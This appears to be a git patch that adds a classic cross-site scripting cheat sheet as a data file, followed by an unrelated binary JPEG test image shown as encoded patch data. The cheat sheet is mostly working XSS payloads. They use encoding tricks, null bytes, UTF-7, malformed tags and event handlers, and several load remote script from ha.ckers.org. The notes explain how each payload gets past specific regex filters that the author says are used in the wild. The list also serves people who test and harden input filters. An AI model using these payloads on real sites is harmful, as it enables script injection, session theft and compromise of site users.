+&#x0003c; +&#x00003c; +&#x000003c; +&#X3c +&#X03c +&#X003c +&#X0003c +&#X00003c +&#X000003c +&#X3c; +&#X03c; +&#X003c; +&#X0003c; +&#X00003c; +&#X000003c; +&#x3C +&#x03C +&#x003C +&#x0003C +&#x00003C +&#x000003C +&#x3C; +&#x03C; +&#x003C; +&#x0003C; +&#x00003C; +&#x000003C; +&#X3C +&#X03C +&#X003C +&#X0003C +&#X00003C +&#X000003C +&#X3C; +&#X03C; +&#X003C; +&#X0003C; +&#X00003C; +&#X000003C; +\x3c +\x3C +\u003c +\u003C + All of the possible combinations of the character "<" in HTML and JavaScript. Most of these won't render, but many of them can get rendered in certain circumstances (standards are great, aren't they?). + + Browser support: + + + Case Insensitive + <IMG SRC=JaVaScRiPt:alert('XSS')> + Case insensitive XSS attack vector. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + HTML Entities + <IMG SRC=javascript:alert(&quot;XSS&quot;)> + HTML entities (the semicolons are required for this to work). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + Grave Accents + <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> + Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Image w/CharCode + <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> + If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + UTF-8 Unicode Encoding + <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> + UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + Long UTF-8 Unicode w/out Semicolons + <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> + Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for "&#XX;", since most people don't know about padding - up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate an html encoded string (I've seen this in the wild). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + DIV w/Unicode + <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> + DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Hex Encoding w/out Semicolons + <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> + Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string = ~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + UTF-7 Encoding + <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- + UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one). You don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire http://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google's custom 404 script. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + Escaping JavaScript escapes + \";alert('XSS');// + Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a="";alert('XSS');//";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + End title tag + </TITLE><SCRIPT>alert("XSS");</SCRIPT> + This is a simple XSS vector that closes TITLE tags, which can encapsulate the malicious cross site scripting attack. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + STYLE w/broken up JavaScript + <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> + STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Embedded Tab + <IMG SRC="jav ascript:alert('XSS');"> + Embedded tab to break up the cross site scripting attack. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + Embedded Encoded Tab + <IMG SRC="jav&#x09;ascript:alert('XSS');"> + Embedded encoded tab to break up XSS. For some reason Opera does not allow the encoded tab, but it does allow the previous tab XSS and encoded newline and carriage returns below. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Embedded Newline + <IMG SRC="jav&#x0A;ascript:alert('XSS');"> + Embedded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + Embedded Carriage Return + <IMG SRC="jav&#x0D;ascript:alert('XSS');"> + Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + Multiline w/Carriage Returns + <IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > + Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + Null Chars 1 + perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out + Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Null Chars 2 + perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out + Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I've seen this vector bypass some of the most restrictive XSS filters to date + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Spaces/Meta Chars + <IMG SRC=" &#14; javascript:alert('XSS');"> + Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word "javascript:" - which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Non-Alpha/Non-Digit + <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> + Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "<SCRIPT\s" != "<SCRIPT/XSS\s" + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Non-Alpha/Non-Digit Part 2 + <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> + Non-alpha-non-digit XSS part 2. yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this does not apply to the grave accent char as seen here. + + Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] + + + No Closing Script Tag + <SCRIPT SRC=http://ha.ckers.org/xss.js + In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally. + + Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Protocol resolution in script tags + <SCRIPT SRC=//ha.ckers.org/.j> + This particular variant was submitted by Lukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the MIME type because the browser knows it in context of a SCRIPT tag. + + Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Half-Open HTML/JavaScript + <IMG SRC="javascript:alert('XSS')" + Unlike Firefox, the IE rendering engine doesn't add extra data to your page, but it does allow the "javascript:" directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close > tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex: + /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ +As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + Double open angle brackets + <IFRAME SRC=http://ha.ckers.org/scriptlet.html < + This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it's surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't + + Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Extraneous Open Brackets + <<SCRIPT>alert("XSS");//<</SCRIPT> + (Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + Malformed IMG Tags + <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> + Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + No Quotes/Semicolons + <SCRIPT>a=/XSS/ +alert(a.source)</SCRIPT> + No single quotes or double quotes or semicolons. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + Event Handlers List 1 + See Below + Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (http://www.secaron.de/) for the HTML+TIME updates: + +-FSCommand() (execute from within an embedded Flash object) + +-onAbort() (when user aborts the loading of an image) + +-onActivate() (when object is set as the active element) + +-onAfterPrint() (activates after user prints or previews print job) + +-onAfterUpdate() (activates on data object after updating data in the source object) + +-onBeforeActivate() (fires before the object is set as the active element) + +-onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard (use the execCommand("Copy") function) + +-onBeforeCut() (attacker executes the attack string right before a selection is cut) + +-onBeforeDeactivate() (fires right after the activeElement is changed from the current object) + +-onBeforeEditFocus() (fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected) + +-onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function) + +-onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function) + +-onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent) + +-onBegin() (fires immediately when the element's timeline begins) + +-onBlur() (in the case where another popup is loaded and window loses focus) + +-onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window) + +-onCellChange() (fires when data changes in the data provider) + +-onChange() (fires when select, text, or TEXTAREA field loses focus and its value has been modified) + +-onClick() (fires when someone clicks on a form) + +-onContextMenu() (user would need to right click on attack area) + +-onControlSelect() (fires when the user is about to make a control selection of the object) + +-onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command) + +-onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command) + +-onDataAvailible() (user would need to change data in an element, or attacker could perform the same function) + +-onDataSetChanged() (fires when the data set exposed by a data source object changes) + +-onDataSetComplete() (fires to indicate that all data is available from the data source object) + +-onDblClick() (fires when user double-clicks a form element or a link) + +-onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document) + +-onDrag() (requires that the user drags an object) + +-onDragEnd() (requires that the user drags an object) + +-onDragLeave() (requires that the user drags an object off a valid location) + +-onDragEnter() (requires that the user drags an object into a valid location) + +-onDragOver() (requires that the user drags an object into a valid location) + +-onDragDrop() (user drops an object (e.g. file) onto the browser window) + +-onDrop() (fires when user drops an object (e.g. file) onto the browser window) + + + Browser support: + + + Event Handlers List 2 + See Below + -onEnd() (fires when the timeline ends. This can be exploited, like most of the HTML+TIME event handlers by doing something like <P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">) + +-onError() (loading of a document or image causes an error) + +-onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object) + +-onFilterChange() (fires when a visual filter completes state change) + +-onFinish() (attacker could create the exploit when marquee is finished looping) + +-onFocus() (attacker executes the attack string when the window gets focus) + +-onFocusIn() (attacker executes the attack string when window gets focus) + +-onFocusOut() (attacker executes the attack string when window loses focus) + +-onHelp() (attacker executes the attack string when users hits F1 while the window is in focus) + +-onKeyDown() (fires when user depresses a key) + +-onKeyPress() (fires when user presses or holds down a key) + +-onKeyUp() (fires when user releases a key) + +-onLayoutComplete() (user would have to print or print preview) + +-onLoad() (attacker executes the attack string after the window loads) + +-onLoseCapture() (can be exploited by the releaseCapture() method) + +-onMediaComplete() (when a streaming media file is used, this event could fire before the file starts playing) + +-onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem) + +-onMouseDown() (the attacker would need to get the user to click on an image) + +-onMouseEnter() (fires when cursor moves over an object or area) + +-onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again) + +-onMouseMove() (the attacker would need to get the user to mouse over an image or table) + +-onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again) + +-onMouseOver() (fires when cursor moves over an object or area) + +-onMouseUp() (the attacker would need to get the user to click on an image) + +-onMouseWheel() (the attacker would need to get the user to use their mouse wheel) + +-onMove() (user or attacker would move the page) + +-onMoveEnd() (user or attacker would move the page) + +-onMoveStart() (user or attacker would move the page) + +-onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline) + +-onPaste() (user would need to paste or attacker could use the execCommand("Paste") function) + +-onPause() (fires on every element that is active when the timeline pauses, including the body element) + +-onProgress() (attacker would use this as a flash movie was loading) + +-onPropertyChange() (user or attacker would need to change an element property) + +-onReadyStateChange() (user or attacker would need to change an element property) + + + Browser support: + + + Event Handlers List 3 + See Below + -onRepeat() (fires once for each repetition of the timeline, excluding the first full cycle) + +-onReset() (fires when user or attacker resets a form) + +-onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>) + +-onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>) + +-onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>) + +-onResume() (fires on every element that becomes active when the timeline resumes, including the body element) + +-onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward) + +-onRowEnter() (user or attacker would need to change a row in a data source) + +-onRowExit() (user or attacker would need to change a row in a data source) + +-onRowsDelete() (user or attacker would need to delete a row in a data source) + +-onRowsInserted() (user or attacker would need to insert a row in a data source) + +-onScroll() (user would need to scroll, or attacker could use the scrollBy() function) + +-onSeek() (fires when the timeline is set to play in any direction other than forward) + +-onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) + +-onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) + +-onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) + +-onStart() (fires at the beginning of each marquee loop) + +-onStop() (user would need to press the stop button or leave the webpage) + +-onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire) + +-onSubmit() (requires attacker or user submits a form) + +-onTimeError() (fires when user or attacker sets a time property, such as "dur", to an invalid value) + +-onTrackChange() (fires when user or attacker changes track in a playList) + +-onUnload() (fires when the user clicks any link or presses the back button or attacker forces a click) + +-onURLFlip() (fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file) + +-seekSegmentTime() (locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.) + + + Browser support: + + + Evade Regex Filter 1 + <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> + For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of the following regex filter: + /<script[^>]+src/i + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + Evade Regex Filter 2 + <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> + For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter: + /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i + +(this is an important one, because I've seen this regex in the wild) + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + Evade Regex Filter 3 + <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> + Another XSS to evade this regex filter: + /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + Evade Regex Filter 4 + <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> + Yet another XSS to evade the same filter: + /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i +The only thing I've seen work against this XSS attack if you still want to allow <SCRIPT> tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags) + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + Evade Regex Filter 5 + <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> + And one last XSS attack (using grave accents) to evade this regex: + /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Filter Evasion 1 + <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> + This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + Filter Evasion 2 + <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> + Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + diff --git a/tests/data/images/2004-07-22-DSC_0007.jpg b/tests/data/images/2004-07-22-DSC_0007.jpg new file mode 100644 index 0000000000000000000000000000000000000000..a9703f333d3faf1eeb9decdb6e55a05c5c848f89 GIT binary patch literal 87348 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 